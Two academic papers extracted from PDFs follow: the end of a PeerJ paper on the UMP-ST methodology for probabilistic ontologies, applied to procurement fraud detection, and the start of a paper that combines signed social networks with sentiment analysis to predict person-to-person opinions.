http://dx.doi.org/10.7717/peerj-cs.77 from a more detailed description of the activities performed, roles involved, and artifacts produced in its application. The Eclipse Process Framework (EPF) could be employed to provide a structured way to present the disciplines, activities, best practices, roles, etc. As customizable software process engineering framework, EPF has two major goals (Eclipse Foundation, 2011): • ‘‘To provide an extensible framework and exemplary tools for software process engineering - method and process authoring, library management, configuring and publishing a process.’’ • ‘‘To provide exemplary and extensible process content for a range of software development and management processes supporting iterative, agile, and incremental development, and applicable to a broad set of development platforms and applications’’. Capturing UMP-ST within EPF will provide guidance and tools to a broad community of developers for following the UMP-ST to develop probabilistic ontologies. A process that is made freely available with the EPF framework is the OpenUP (Balduino, 2007) which is a minimally sufficient software development process. This process could be used as a starting point to describe the UMP-ST process, since OpenUP is extensible to be used as foundation on which process content can be added or tailored as needed. Two major challenges must be addressed to enable broad use of semantically rich uncertainty management methods. The first is scalability. There have been some attempts to grapple with the inherent scalability challenges of reasoning with highly expressive probabilistic logics. For example, lifted inference (Braz, Amir & Roth, 2007) exploits repeated structure in a grounded model to avoid unnecessary repetition of computation. Approximate inference methods such as MC-SAT and lazy inference (Domingos & Lowd, 2009) have been applied to inference in Markov logic networks. Hypothesis management methods (Haberlin, Costa & Laskey, 2010a; Haberlin, Costa & Laskey, 2010b; Laskey, Mahoney & Wright, 2001) can help to control the complexity of the constructed ground network. Much work remains on developing scalable algorithms for particular classes of problems and integrating such algorithms into ontology engineering tools. Finally, ontologies generated using the UMP-ST process would greatly benefit from methods that can assess how well and comprehensively the main aspects of uncertainty representation and reasoning are addressed. Thus, a natural path in further developing the UMP-ST is to leverage ongoing work in this area, such as the Uncertainty Representation and Reasoning Evaluation Framework (URREF) (Costa et al., 2012; De Villiers et al., 2015) developed by the International Society of Information Fusion’s working group on Evaluation of Techniques for Uncertainty Reasoning (ETURWG). We are already participating in this effort and plan to leverage its results in the near future. CONCLUSION The Uncertainty Modeling Process for Semantic Technology (UMP-ST) addresses an unmet need for a probabilistic ontology modeling methodology. While there is extensive literature on both probability elicitation and ontology engineering, these fields have developed nearly independently and there is little literature on how to bring them together Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 29/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77 to define a semantically rich domain model that captures relevant uncertainties. Such expressive probabilistic representations are important for a wide range of domains. There is a robust literature emerging on languages for capturing the requisite knowledge. However, modelers can as yet find little guidance on how to build these kinds of semantically rich probabilistic models. This paper provides such a methodology. UMP-ST was described and illustrated with a use case on identifying fraud in public procurement in Brazil. The use case was presented with a focus on illustrating the activities that must be executed within each discipline in the POMC cycle in the context of the fraud identification problem. The core concepts in applying UMP-ST to the procurement domain can easily be migrated to completely distinct domains. For instance, it was also used in defining a PO for Maritime Domain Awareness (MDA) (Carvalho, 2011) which supports the identification of terrorist threats and other suspicious activities in the maritime domain. The MDA PO evolved through several versions, showing how the UMP-ST process supports iterative model evolution and enhancement. ACKNOWLEDGEMENTS The authors would like to thank the Brazilian Office of the Comptroller General for their active support since 2008 and for providing the human resources necessary to conduct this research. More specifically, the authors would like to thank the Department of Research and Strategic Information for providing the experts who explained the fraud domain in detail and provided help on creating and validating the use case described. The authors would also like to thank Dr. Marcelo Ladeira and his students from the Universidade de Brasília for their work on developing the UnBBayes probabilistic network framework, and for providing support to this research as needed. ADDITIONAL INFORMATION AND DECLARATIONS Funding This research was partially supported by the Office of Naval Research (ONR), under Contract #N00173-09-C-4008. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Office of Naval Research (ONR): #N00173-09-C-4008. Competing Interests Kathryn B. Laskey is an Academic Editor for PeerJ Computer Science. The authors declare there are no other competing interests. Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 30/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77 Author Contributions • Rommel N. Carvalho conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Kathryn B. Laskey conceived and designed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper, supervised software development, supervised research, directed Dr. Carvalho’s PhD dissertation. • Paulo C.G. Da Costa conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper, supervised software development, served on Dr. Carvalho’s PhD committee. Data Availability The following information was supplied regarding data availability: The probabilistic ontology tool is available for download from http://sourceforge.net/ projects/unbbayes/. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.77#supplemental-information. REFERENCES Adelman L. 1992. Evaluating decision support and expert systems. 1st edition. New York: John Wiley & Sons, Incorporated. Alencar DB. 2015. Use of probabilistic ontologies and multi-entity Bayesian networks for defining, modelling, guiding and aiding decision-making forensic processes. M.Sc. Thesis, Forensic Computing and Cyber Crime Investigation, University College Dublin, Dublin, Ireland. Allemang D, Hendler JA. 2011. Semantic web for the working ontologist. 2nd edition. Burlington: Morgan Kaufmann. Balduino R. 2007. Introduction to OpenUP (open unified process). Technical Report. The Eclipse Foundation, Ottawa. Braz R, Amir E, Roth D. 2007. Lifted first-order probabilistic inference. In: Introduction to statistical relational learning. Cambridge: MIT Press. Burgman M, Fidler F, Mcbride M, Walshe T, Wintle B. 2006. Eliciting expert judgments: literature review. Technical Report. Australian Centre for Excellence in Risk Analysis (ACERA), Melbourne. Carvalho RN. 2008. Plausible reasoning in the semantic web using multi-entity bayesian networks—MEBN. M.Sc. Thesis, University of Brasilia, Brasilia, Brazil. Carvalho RN. 2011. Probabilistic ontology: representation and modeling methodology. PhD Thesis, George Mason University, Fairfax, VA, USA. Carvalho RN, Costa PC, Laskey KB, Chang K. 2010. PROGNOS: predictive situational awareness with probabilistic ontologies. In: Proceedings of the 13th international conference on information fusion. Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 31/36 https://peerj.com http://sourceforge.net/projects/unbbayes/ http://sourceforge.net/projects/unbbayes/ http://dx.doi.org/10.7717/peerj-cs.77#supplemental-information http://dx.doi.org/10.7717/peerj-cs.77#supplemental-information http://dx.doi.org/10.7717/peerj-cs.77 Carvalho RN, Dos Santos LL, Ladeira M, Da Rocha HA, Mendes GL. 2014. UMP-ST plug-in: documenting, maintaining and evolving probabilistic ontologies using UnBBayes framework. In: Uncertainty reasoning for the semantic web III. New York: Springer International Publishing, 1–20. Carvalho RN, Haberlin R, Costa PC, Laskey KB, Chang K. 2011. Modeling a probabilis- tic ontology for maritime domain awareness. In: Proceedings of the 14th international conference on information fusion. Carvalho RN, Ladeira M, Santos L, Matsumoto S, Costa PC. 2008. UnBBayes-MEBN: comments on implementing a probabilistic ontology tool. In: Guimarães N, Isaías P, eds. Proceedings of the IADIS international conference applied computing 2008. Algarve: IADIS, 211–218. Carvalho RN, Ladeira M, Santos LL, Matsumoto S, Costa PC. 2009. A GUI tool for plausible reasoning in the semantic web using MEBN. In: Nedjah N, Mourelle LM, Kacprzyk J, eds. Innovative applications in data mining, studies in computational intelligence, vol. 169. New York: Springer, 17–45. Carvalho RN, Laskey KB, Costa PC. 2013. PR-OWL 2.0–bridging the gap to OWL semantics. In: Bobillo F, Costa PC, d’Amato C, Fanizzi N, Laskey KB, Laske KJ, Lukasiewicz T, Nickles M, Pool M, eds. Uncertainty reasoning for the semantic web II. number 7123 in lecture notes in computer science. Berlin Heidelberg: Springer, 1–18. Clemen RT, Reilly T. 2004. Making hard decisions with decision tools suite update edition. 1st edition. Pacific Grove: Cengage Learning. Costa PC. 2005. Bayesian semantics for the semantic web. PhD Thesis, George Mason University, Fairfax, VA, USA. Costa PC, Laskey KB, Blasch E, Jousselme A-L. 2012. Towards unbiased evaluation of uncertainty reasoning: the URREF ontology. In: Proceedings of the fifteenth international conference on information fusion, Singapore. Piscataway: IEEE. Costa PC, Laskey KB, Chang K. 2009. PROGNOS: applying probabilistic ontologies to distributed predictive situation assessment in naval operations. In: Proceedings of the fourteenth international command and control research and technology symposium (ICCRTS 2009). Costa PC, Laskey KB, Laskey KJ. 2005. PR-OWL: a bayesian framework for the semantic web. In: Proceedings of the first workshop on uncertainty reasoning for the semantic web (URSW 2005). Costa PC, Laskey KB, Laskey KJ. 2008. PR-OWL: a bayesian ontology language for the semantic web. In: Uncertainty reasoning for the semantic web I: ISWC international workshops, URSW 2005–2007, revised selected and invited papers. Berlin: Springer- Verlag, 88–107. Cozman FG, Maua DD. 2015. Specifying probabilistic relational models with description logics. In: Proceedings of the XII encontro nacional de inteligência artificial e computa- cional (ENIAC). Natal, RN, Brazil. De Hoog R. 1998. Methodologies for building knowledge based systems: achievements and prospects. In: Liebowitz J, ed. Handbook of applied expert systems. Chapter 1. Boca Raton: CRC Press. Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 32/36 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.77 De Raedt L. 1996. Advances in inductive logic programming. Fairfax: IOS Press. De Souza RM. 2011. UnBBayes plug-in for documenting probabilistic ontologies using UMP-ST. B.S. Thesis, University of Brasilia, Brasilia, Brazil. De Villiers J, Laskey KB, Jousselme A-L, Blasch EP, Waal AD, Pavlin G, Costa PC. 2015. Representation, quantification and evaluation for data and information fusion. In: Proceedings of the eighteenth international conference on information fusion. Piscataway: IEEE. Dhurandhar A, Ettl MR, Graves BC, Ravi RK. 2015a. System and method for identifying procurement fraud/risk. US Patent. No. 20150242856. Dhurandhar A, Ravi R, Graves B, Maniachari G, Ettl M. 2015b. Robust system for identifying procurement fraud. In: Proccedings of the twenty-seventh IAAI conference. Palo Alto: AAAI Press. Ding Z, Peng Y, Pan R. 2006. BayesOWL: uncertainty modeling in semantic web ontologies. In: Soft computing in ontologies and semantic web. Vol. 204. Berlin / Heidelberg: Springer, 3–29. Domingos P, Lowd D. 2009. Markov logic: an interface layer for artificial intelligence. 1st edition. Williston: Morgan and Claypool Publishers. Druzdzel MJ, Van der Gaag LC. 2000. Building probabilistic networks: where do the numbers come from - a guide to the literature, guest editors’ intro- duction. IEEE Transactions in Knowledge and Data Engineering 12:481–486 DOI 10.1109/TKDE.2000.868901. Eclipse Foundation. 2011. Eclipse process framework project (EPF). Available at http: //www.eclipse.org/epf/general/description.php. Fernández-López M, Gómez-Pérez A, Juristo N. 1997. METHONTOLOGY: from ontological art to ontological engineering. In: Ontological engineering: papers from the 1997 AAAI spring symposium. Menlo Park: AAAI Press. Flores AER. 2004. Auditoria y mecanismos anticorrupcion (segunda parte). Quipuka- mayoc 11(22):91–100. Frizzo H, Oliveira PL. 2014. Public procurement in Brazil: overview. Available at http: //us.practicallaw.com/6-521-4700. Garthwaite PH, Kadane JB, O’Hagan A. 2005. Statistical methods for eliciting probabil- ity distributions. Journal of the American Statistical Association 100(470):680–701 DOI 10.1198/016214505000000105. Gasevic D, Djuric D, Devedzic V, Damjanovi V. 2004. Converting UML to OWL ontologies. In: Proceedings of the 13th international world wide web conference on alternate track papers &Amp; posters. New York: ACM, 488–489. Getoor L, Taskar B. 2007. Introduction to statistical relational learning. Cambridge: MIT Press. Gomez-Perez A, Corcho O, Fernandez-Lopez M. 2004. Ontological engineering: with examples from the areas of knowledge management, e-commerce and the semantic web, first edition. New York: Springer. Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 33/36 https://peerj.com http://dx.doi.org/10.1109/TKDE.2000.868901 http://www.eclipse.org/epf/general/description.php http://www.eclipse.org/epf/general/description.php http://us.practicallaw.com/6-521-4700 http://us.practicallaw.com/6-521-4700 http://dx.doi.org/10.1198/016214505000000105 http://dx.doi.org/10.7717/peerj-cs.77 Gotel O, Finkelstein C. 1994. An analysis of the requirements traceability problem. In: Proceedings of the first international conference on requirements engineering, 1994, 94–101. Gregorini A. 2009. Auditoria de Deteccao de Fraude. Revista da CGU IV(6):8–20. Haberlin R. 2013. Probabilistic ontology reference architecture and development methodology. PhD Thesis, George Mason University. Haberlin R, Costa PC, Laskey KB. 2010a. Hypothesis management in support of inferential reasoning. In: Proceedings of the fifteenth international command and control research and technology symposium. Haberlin R, Costa PC, Laskey KB. 2010b. A model-based systems engineering approach to hypothesis management. In: Proceedings of the third international conference on model-based systems engineering. Haberlin R, Costa PC, Laskey KB. 2014. Probabilistic ontology architecture for a terrorist identification decision support system. In: Proceedings of the nineteenth international command and control research and technology symposium. Hazman M, R. El-Beltagy S, Rafea A. 2011. A survey of ontology learning approaches. International Journal of Computer Applications 22(9):36–43 DOI 10.5120/2610-3642. Heckerman D, Meek C, Koller D. 2004. Probabilistic Models for Relational Data. Tech Report MSR-TR-2004-30. Microsoft Research. Huber GP. 1974. Methods for quantifying subjective probabilities and multi-attribute utilities*†. Decision Sciences 5(3):430–458 DOI 10.1111/j.1540-5915.1974.tb00630.x. INCOSE. 2015. INCOSE systems engineering handbook: a guide for system life cycle processes and activities. Fourth edition. New York: Wiley. Jacobson I, Booch G, Rumbaugh J. 1999. The unified software development process. Boston: Addison-Wesley Professional. Kahneman D, Slovic P, Tversky A. 1982. Judgment under uncertainty: heuristics and biases. Cambridge: Cambridge University Press. Koller D, Levy A, Pfeffer A. 1997. P-CLASSIC: a tractable probabilistic description logic. In: Proceedings of AAAI-97. Menlo Park: AAAI, 390–397. Korb KB, Nicholson AE. 2003. Bayesian Artificial intelligence. 1st edition. New York: Chapman & Hall/CRC. Kruchten P. 2000. The Rational Unified Process: an introduction. 2 edition. Boston: Addison-Wesley Professional. Laskey KB. 2008. MEBN: a language for first-order bayesian knowledge bases. Artificial Intelligence 172(2–3):140–178 DOI 10.1016/j.artint.2007.09.006. Laskey KB, Mahoney SM. 2000. Network engineering for agile belief network mod- els. IEEE Transactions on Knowledge and Data Engineering 12(4):487–498 DOI 10.1109/69.868902. Laskey KB, Mahoney SM, Wright E. 2001. Hypothesis management in situation- specific network construction. In: Koller D, ed. Uncertainty in artificial intelligence: proceedings of the seventeenth conference. San Mateo: Morgan Kaufman, 9. Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 34/36 https://peerj.com http://dx.doi.org/10.5120/2610-3642 http://dx.doi.org/10.1111/j.1540-5915.1974.tb00630.x http://dx.doi.org/10.1016/j.artint.2007.09.006 http://dx.doi.org/10.1109/69.868902 http://dx.doi.org/10.7717/peerj-cs.77 Laskey KJ, Laskey KB. 2008. Uncertainty reasoning for the world wide web: report on the URW3-XG incubator group. In: Proceedings of the fourth international workshop on uncertainty reasoning for the semantic web (URSW 2008). Karlsruhe. Lukasiewicz T. 2008. Expressive probabilistic description logics. Artificial Intelligence 172(6–7):852–883 DOI 10.1016/j.artint.2007.10.017. Luna JEO, Revoredo K, Cozman FG. 2010. Learning sentences and assessments in probabilistic description logics. In: Proceedings of the 6th uncertainty reasoning for the semantic web (URSW 2010) on the 9th international semantic web conference (ISWC 2010), 85–96. Mahoney S, Laskey KB. 1998. Constructing situation specific belief networks. In: Proceedings of the 14th annual conference on uncertainty in artificial intelligence (UAI- 98). San Francisco: Morgan Kaufmann. Matsumoto S. 2011. Framework based in plug-ins for reasoning with probabilistic ontologies. M.Sc. Thesis, University of Brasilia, Brasilia, Brazil. Matsumoto S, Carvalho RN, Ladeira M, Costa PC, Santos LL, Silva D, Onishi M, Machado E, Cai K. 2011. UnBBayes: a Java framework for probabilistic models in AI. In: Java in academia and research. Hong Kong: iConcept Press. O’Hagan A, Buck CE, Daneshkhah A, Eiser JR, Garthwaite PH, Jenkinson DJ, Rakow JEOaT. 2006. Uncertain judgements: eliciting experts’ probabilities. 1st edition. London: Wiley. Oliveira A. 2009. Licitacao: fraudes comuns nas aquisicoes de bens, enquadramento legal e procedimentos preventivos. Undergraduate Thesis, Universidade Federal de Santa Catarina, Florianopolis, Santa Catarina, Brazil. Pearl J. 1988. Probabilistic reasoning in intelligent systems: networks of plausible inference. 1st edition. Cambridge: Morgan Kaufmann. Project Management Institute. 2004. A guide to the project management body of knowl- edge (PMBOK guide). Newtown Square: Project Management Institute. Reed SL, Lenat DB. 2002. Mapping ontologies into Cyc. In: Proceedings of the AAAI 2002 conference workshop on ontologies for the semantic web. 1–6. Renooij S. 2001. Probability elicitation for belief networks: issues to consider. The Knowledge Engineering Review 16(03):255–269 DOI 10.1017/S0269888901000145. Royce WW. 1970. Managing the development of large software systems: concepts and techniques. In: Proceedings of IEEE WESTCON. Piscataway: IEEE, 1–9. Reprinted in proceedings of the ninth international conference on software engineering, March 1987, pp. 328. Rumbaugh J, Jacobson I, Booch G. 1999. The unified modeling language reference manual. Boston: Addison-Wesley Professional. Santos LL, Carvalho RN, Ladeira M, Weigang L. 2014. Probabilistic ontologies incre- mental modeling using UnBBayes. In: Proceedings of encontro nacional de inteligência artificial e computacional, ENIAC. Sao Carlos, 266–271. Schum DA, Starace S. 2001. The evidential foundations of probabilistic reasoning. Evanston: Northwestern University Press. Sommerville I. 2010. Software engineering. 9 edition. Boston: Addison Wesley. Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 35/36 https://peerj.com http://dx.doi.org/10.1016/j.artint.2007.10.017 http://dx.doi.org/10.1017/S0269888901000145 http://dx.doi.org/10.7717/peerj-cs.77 Sure Y, Staab S, Studer R. 2004. On-to-knowledge methodology (OTKM). In: Handbook on ontologies. New York: Springer, 117–132. Wallsten TS, Budescu DV. 1983. Encoding subjective probabilities: a psychological and psychometric review. Management Science 29(2):151–173 DOI 10.1287/mnsc.29.2.151. Wiegers KE. 2003. Software requirements. 2nd edition. Redmond: Microsoft Press. Winkler RL. 1967. The assessment of prior distributions in Bayesian analysis. Journal of the American Statistical Association 62(319):776–800 DOI 10.1080/01621459.1967.10500894. Yang Y, Calmet J. 2005. OntoBayes: an ontology-driven uncertainty model. In: Proceed- ings of the international conference on computational intelligence for modelling, control and automation and international conference on intelligent agents, web technologies and internet commerce vol-1 (CIMCA-IAWTIC’06) - Volume 01. Piscataway: IEEE Computer Society, 457–463. Carvalho et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.77 36/36 https://peerj.com http://dx.doi.org/10.1287/mnsc.29.2.151 http://dx.doi.org/10.1080/01621459.1967.10500894 http://dx.doi.org/10.7717/peerj-cs.77 work_5lcn66xezff75mzhcf2ufszade ---- Exploiting Social Network Structure for Person-to-Person Sentiment Analysis Robert West Stanford University west@cs.stanford.edu Hristo S. Paskov Stanford University hpaskov@stanford.edu Jure Leskovec Stanford University jure@cs.stanford.edu Christopher Potts Stanford University cgpotts@stanford.edu Abstract Person-to-person evaluations are prevalent in all kinds of discourse and important for es- tablishing reputations, building social bonds, and shaping public opinion. Such evaluations can be analyzed separately using signed so- cial networks and textual sentiment analysis, but this misses the rich interactions between language and social context. To capture such interactions, we develop a model that pre- dicts individual A’s opinion of individual B by synthesizing information from the signed social network in which A and B are embed- ded with sentiment analysis of the evaluative texts relating A to B. We prove that this prob- lem is NP-hard but can be relaxed to an ef- ficiently solvable hinge-loss Markov random field, and we show that this implementation outperforms text-only and network-only ver- sions in two very different datasets involving community-level decision-making: the Wiki- pedia Requests for Adminship corpus and the Convote U.S. Congressional speech corpus. 1 Introduction People’s evaluations of one another are prevalent in all kinds of discourse, public and private, across ages, genders, cultures, and social classes (Dunbar, 2004). Such opinions matter for establishing rep- utations and reinforcing social bonds, and they are especially consequential in political contexts, where they take the form of endorsements, accusations, and assessments intended to sway public opinion. The significance of such person-to-person evalu- ations means that there is a pressing need for com- putational models and technologies that can analyze them. Research on signed social networks suggests one path forward: how one person will evaluate an- other can often be predicted from the network they are embedded in. Linguistic sentiment analysis sug- gests another path forward: one could leverage tex- tual features to predict the valence of evaluative texts describing people. Such independent efforts have been successful, but they generally neglect the ways in which social and linguistic features complement each other. In some settings, textual data is sparse but the network structure is largely observed; in oth- ers, text is abundant but the network is partly or un- reliably recorded. In addition, we often see rich in- teractions between the two kinds of information— political allies might tease each other with negative language to enhance social bonds, and opponents of- ten use sarcastically positive language in their criti- cisms. Separate sentiment or signed-network mod- els will miss or misread these signals. We develop (Sec. 3) a graphical model that syn- thesizes network and linguistic information to make more and better predictions about both. The objec- tive of the model is to predict A’s opinion of B using a synthesis of the structural context around A and B inside the social network and sentiment analysis of the evaluative texts relating A to B. We prove that the problem is NP-hard but that it can be relaxed to an efficiently solvable hinge-loss Markov random field (Broecheler et al., 2010), and we show that this implementation outperforms text-only and network- only versions in two very different datasets involv- ing community-level decision-making: the Wikipe- dia Requests for Adminship corpus, in which Wi- kipedia editors discuss and vote on who should be promoted within the Wikipedia hierarchy (Sec. 4), and the Convote U.S. Congressional speech corpus (Thomas et al., 2006), in which elected officials dis- cuss political topics (Sec. 5). These corpora differ dramatically in size, in the style and quality of their textual data, and in the structure and observability of their networks. Together, they provide a clear pic- ture of how joint models of text and network struc- ture can excel where their component parts cannot. 2 Background and related work 2.1 Sentiment analysis In NLP, the label sentiment analysis covers diverse phenomena concerning how information about emo- tions, attitudes, perspectives, and social identities is conveyed in language (Pang and Lee, 2008). Most work assumes a dimensional model in which emo- tions are defined primarily by valence/polarity and arousal/intensity (Russell, 1980; Feldman Barrett and Russell, 1998; Rubin and Talerico, 2009), and the dominant application is predicting the valence of product, company, and service reviews. We adopt the conceptual assumptions of this work for our basic sentiment model, but our focus is on person-to-person evaluations and their social conse- quences. This involves elements of work on mod- eling political affiliation (Agrawal et al., 2003; Mal- ouf and Mullen, 2008; Yu et al., 2008), bias (Yano et al., 2010; Recasens et al., 2013), and stance on de- bate topics (Thomas et al., 2006; Somasundaran and Wiebe, 2010; Lin et al., 2006; Anand et al., 2011), but these aspects of belief and social identity are not our primary concern. Rather, we expect them to be predictive of the sentiment classifications we aim to make—e.g., if two people share political views, they will tend to evaluate each other positively. Recent work in sentiment analysis has brought in topical, contextual, and social information to make more nuanced predictions about language (Jurafsky et al., 2014; Wilson et al., 2005; Blitzer et al., 2007). We build on these insights with our model, which seeks to modulate sentiment predictions based on network information (and vice versa). 2.2 Signed-network analysis Many social networks encode person-to-person sen- timent information via signed edges between users summarizing their opinions of each other. In this set- ting, one can leverage sociological theories of pair- wise relationships and group-level organization to identify and understand patterns in these relation- ships (Heider, 1946; Cartwright and Harary, 1956). Balance theory is based on simple intuitions like ‘a friend of my friend is my friend’, ‘an enemy of my enemy is my friend’, and ‘an enemy of my friend is my enemy’. In graph theory, these are statements about the edge signs of triangles of connected nodes: given the signs of two edges, balance theory predicts the third, as summarized in Fig. 1(a), where the two given edges (gray) determine the third (black). For directed relationships, Leskovec et al. (2010b) formulate an alternative called status theory, which posits that networks organize according to social sta- tus: a node has positive edges to others with higher status and negative edges to those with lower sta- tus. Fig. 1(a) illustrates the structure of various di- rected signed triangles, where the sign of the third edge (black) can be inferred based on the signs and directions of the other two (gray). Leskovec et al. (2010b) show that signed edges in networks emerge in a manner that is broadly con- sistent with both of these theories and that social- network structure alone can support accurate edge- sign predictions (Leskovec et al., 2010a). Kunegis et al. (2013) predict hidden positive and negative edges in a scenario where all observed edges are positive. Bach et al. (2013) and Huang et al. (2013) frame sign prediction as a hinge-loss Markov random field, a type of probabilistic graphical model introduced by Broecheler et al. (2010). Our model combines these ideas with a sentiment model to achieve even more robust predictions. 2.3 Synthesis of sentiment & network analysis Models of sentiment and signed networks have been successful at a variety of tasks. However, missing from the current scientific picture is a deep under- standing of the ways in which sentiment expres- sion and social networks interact. To some extent, these interactions are captured by adding contextual and demographic features to a text-based sentiment model, but those features only approximate the rich relational structure encoded in a signed network. Thomas et al. (2006) and Tan et al. (2011) cap- italize on this insight using an elaboration of the + + +– +– – –+ – – – + + + SOCIAL BALANCE THEORY SOCIAL STATUS THEORY + – ? (a) Theories of social balance and status + + – – ? ? + ? “You’re one crazy mofo!” “Love u! :)” “To whom it may concern” (b) Desiderata Figure 1: (a) Predictions of social balance and status theories for the bold black edge, given the thin gray edges. Balance theory reasons about undirected, status theory about directed, triangles. In the status diagrams, node size signifies social status. A positive edge may be replaced by a negative edge in the opposite direction, and vice versa, without changing the prediction. Status theory makes no prediction in the rightmost case. (b) Situations of the sort we aim to capture. At left, the network resolves textual ambiguity. At right, the text compensates for edge-label sparsity. graph-cuts approach of Pang and Lee (2004). They are guided by an assumption of homophily, i.e., that certain social relationships correlate with agreement on certain topics: Thomas et al. (2006) use party af- filiation and mentions in speeches to predict voting patterns, and Tan et al. (2011) use Twitter follows and mentions to predict attitudes about political and social events. Related ideas are pursued by Ma et al. (2011) and Hu et al. (2013), who add terms to their models enforcing homophily between friends with regard to their preferences. We adopt some of the assumptions of the above authors, but our task is fundamentally different in two respects. First, whereas they model person-to- item evaluations, we model person-to-person evalu- ations; these are also the focus of Tang et al. (2013), who, though, use an unsigned network, whereas our work is geared toward distinguishing positive and negative edge labels. Second, the above models make overarching homophily assumptions, whereas we allow our model to explore the full set of triangle configurations suggested by Fig. 1(a). 3 Model Here, we argue that combining textual and structural features can help predict edge signs. We formu- late a model, show that it is computationally hard, and provide a relaxed version that is computationally tractable, building on work by Bach et al. (2013). 3.1 Desiderata In many real-world scenarios, rich features are asso- ciated with edges between two people, such as com- ments they made about each other, messages they exchanged, or other behavioral features. Such fea- tures may contain a strong sentiment signal useful for predicting edge signs and may be used to fit a conventional sentiment model (Sec. 2.1). However, the sign of an edge also depends on the signs of surrounding edges in the network (Sec. 2.2). A purely edge-feature–based sentiment model can- not account for the network structure, since it rea- sons about edges as independent of each other. We argue that considering sentiment and network structure jointly can result in better predictions than either one on its own. Fig. 1(b) provides two illus- trative examples. Here, the gray edge signs are ob- served, while the polarities of the black edges are to be predicted. In the left network, the text of the black edge (‘You’re one crazy mofo!’) might sug- gest a negative polarity. However, a negative black edge would make both triangles inconsistent with balance theory (Fig. 1(a)), whereas a positive black edge makes them consistent with the theory. So, in this case, the network context effectively helps de- tect the teasing, non-literal tone of the statement. In the right network of Fig. 1(b), only one of three edge signs is observed. Predicting two pos- itive edges would be consistent with balance the- ory, but the same would be true for predicting two negative edges. The text on the lower black edge (‘To whom it may concern’) does not carry any clear sentiment signal, but the ‘Love u! :)’ on the other edge strongly suggests a positive polarity. This lets us conclude that the bottom edge should probably be positive, too, since otherwise the triangle would contradict balance theory. This shows that combin- ing sentiment and network features can help when jointly reasoning about several unknown edge signs. 3.2 Problem formulation We now formulate a model capable of synthesizing textual and network features. Notation. We represent the given social network as a signed graph G = (V,E,x), where the vertices V represent people; the edges E, relationships between people in V ; and the sign vector x ∈{0,1}|E| repre- sents edge polarities, i.e., xe = 1 (xe = 0) indicates a positive (negative) polarity for edge e ∈ E. Some types of relationships imply directed edges (e.g., following a user on Twitter, or voting on a can- didate in an election), whereas others imply undi- rected edges (e.g., friendship on Facebook, or agree- ment in a network of politicians). We formulate our problem for undirected graphs here, but the exten- sion to directed graphs is straightforward. We de- fine a triangle t = {e1,e2,e3} ⊆ E to be a set of three edges that form a cycle, and use T to indi- cate the set of all triangles in G. Finally, we use xt = (xe1,xe2,xe3)∈{0,1} 3 to refer to t’s edge signs. Optimization problem. We assume that the struc- ture of the network (i.e., V and E) is fully observed, whereas the edge signs x are only partially observed. Further, we assume that we have a sentiment model that outputs, for each edge e independently, an es- timate pe of the probability that e is of positive po- larity, based on textual features associated with e. The task, then, is to infer the unobserved edge signs based on the observed information. The high-level idea is that we want to infer edge signs that (1) agree with the predictions of the sen- timent model, and (2) form triangles that agree with social theories of balance and status. It is not always possible to meet both objectives simultaneously for all edges and triangles, so we need to find a trade- off. This gives rise to a combinatorial optimization problem, which we term TRIANGLE BALANCE, that seeks to find edge signs x∗ that minimize an objec- tive consisting of both edge and triangle costs:1 x∗ = arg min x∈{0,1}|E| ∑ e∈E c(xe, pe)+ ∑ t∈T d(xt). (1) The first term is the total edge cost, in which each edge e contributes a cost capturing how much its in- ferred sign xe deviates from the prediction pe of the 1Of course, the entries of x∗ corresponding to observed edges are not variable but fixed to their observed values in Eq. 1. sentiment model. The second term, the total triangle cost, penalizes each triangle t according to how un- desirable its configuration is under its inferred signs xt (e.g., if it contradicts status or balance theory). We use the following edge cost function: c(xe, pe) = λ1(1− pe)xe +λ0 pe(1−xe). (2) Here, λ1,λ0 ∈R+ are tunable parameters that allow for asymmetric costs for positive and negative edges, respectively, and pe is the probability of edge e be- ing positive according to the sentiment model alone. Intuitively, the more the inferred edge sign xe devi- ates from the prediction pe of the sentiment model, the higher the edge cost. (Note that at most one of the two sum factors of Eq. 2 is non-zero.) The triangle cost for triangle t is signified by d(xt), which can only take on 8 distinct values be- cause xt ∈{0,1}3 (in practice, there are symmetries that decrease this number to 4). The parameters d(xt) may be tuned so that triangle configurations that agree with social theory have low costs, while those that disagree with it (e.g., ‘the enemy of my friend is my friend’) have high costs. 3.3 Computational complexity The problem defined in Eq. 1 is intuitive, but, as with many combinatorial optimization problems, it is hard to find a good solution. In particular, we sketch a proof of this theorem in Appendix A: Theorem 1. TRIANGLE BALANCE is NP-hard. 3.4 Relaxation as a Markov random field The objective function of Eq. 1 may be seen as defin- ing a Markov random field (MRF) over the underly- ing social network G, with edge potentials (defined by c) and triangle potentials (defined by d). Infer- ence in MRFs (i.e., computing x∗) is a well-stud- ied task for which a variety of methods have been proposed (Koller and Friedman, 2009). However, since our problem is NP-hard, no method can be ex- pected to find x∗ efficiently. One way of dealing with the computational hardness would be to find an ap- proximate binary solution, using techniques such as Gibbs sampling or belief propagation. Another op- tion is to consider a continuous relaxation of the bi- nary problem and find an exact non-binary solution whose edge signs are continuous, i.e., xe ∈ [0,1]. We take this latter approach and cast our problem as a hinge-loss Markov random field (HL-MRF). This is inspired by Bach et al. (2013), who also use an HL-MRF to predict edge signs based on triangle structure, but do not use any edge features. An HL- MRF is an MRF with continuous variables and with potentials that can be expressed as sums of hinge- loss terms of linear functions of the variables (cf. Broecheler et al. (2010) for details). HL-MRFs 